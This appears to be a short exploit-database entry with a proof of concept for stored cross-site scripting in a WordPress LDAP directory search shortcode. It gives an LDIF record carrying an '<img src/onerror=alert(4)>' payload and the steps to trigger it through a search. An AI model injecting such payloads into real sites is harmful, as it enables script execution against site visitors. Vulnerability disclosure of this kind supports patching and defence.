Share
## https://sploitus.com/exploit?id=WPEX-ID:0B953413-CF41-4DE7-AC1F-C6CB995FB158
Add a rogue record to a user on the LDAP server, something like:

dn: cn=xssman,ou=people,dc=example,dc=com
objectClass: inetOrgPerson
uuid: xssman
givenName: XSS man
description: XSS man <img src/onerror=alert(4)>

In the page with the [miniorange_ldap_directory_search] shortcode, click search or search specifically for xssman to trigger the payload.